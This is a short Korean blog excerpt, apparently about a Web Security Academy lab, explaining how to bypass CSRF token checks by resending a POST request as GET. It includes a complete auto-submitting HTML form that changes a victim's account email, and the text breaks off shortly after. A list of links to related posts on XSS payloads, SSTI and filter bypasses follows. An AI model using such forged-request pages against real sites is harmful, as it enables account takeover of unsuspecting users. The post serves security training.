CSRF Token 우회방법

1.요청방식을 변경하여 우회 일부 사이트는 POST 방식일때만 CSRF Token이 적용되고 GET 방식은 CSRF Token이 적용 안될 수 도 있다. 때문에 요청방식을 GET 방식으로 번경하여 요청해본다. POST 방식으로 email, csrf 토큰값이 전송되고 있다. 이것을 GET 방식으로 변경하여 CSRF 코드를 구성하면 다음과 같다. <!DOCTYPE html> <html> <head> <title></title> </head> <body> <form action="https://ac661f7f1eecc08380e69f96009200be.web-security-academy.net/email/change-email" method="GET"> <input type="hidden" name="email" value="[email protected]"> </form> <script> document.forms[0].submit(); </script> </body> </html> CSRF...

원문링크 : CSRF Token 우회방법

등록된 다른 글

CSRF Token 우회방법

등록된 다른 글

인시큐어뱅크 루팅 탐지 및 우회

[IOS] objection 중요정보 검색

Unicode XSS payload

PHP 화이트리스트 필터링 우회 (Multiple Extensions 취약점)

jpeg magic number

pwntools 사용법

Archetype

SSTI(서버 측 템플릿 인젝션)

키자드 로그인

키자드

네이버 블로그

티스토리

커뮤니티